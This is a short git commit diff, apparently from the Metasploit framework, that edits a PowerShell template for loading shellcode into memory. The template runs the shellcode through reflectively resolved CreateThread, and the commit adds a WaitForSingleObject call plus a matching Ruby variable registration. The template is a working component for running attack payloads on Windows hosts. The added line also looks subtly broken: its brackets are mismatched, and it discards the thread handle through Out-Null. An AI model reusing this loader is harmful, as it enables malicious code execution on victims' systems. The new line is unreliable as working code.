WaitForThread

2013-12-16 12:44:58 +00:00 · 2013-12-16 12:44:58 +00:00 · 8dfcc8aa77
parent ee4766eceb
commit 8dfcc8aa77
2 changed files with 3 additions and 1 deletions
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@ -27,4 +27,5 @@ for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
 	$%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
 }

-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null		
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@ -938,6 +938,7 @@ require 'msf/core/exe/segment_injector'
    rig.init_var(:var_type_builder)
    rig.init_var(:var_buffer)
    rig.init_var(:var_memset)
+    rig.init_var(:var_hthread)

    hash_sub = rig.to_h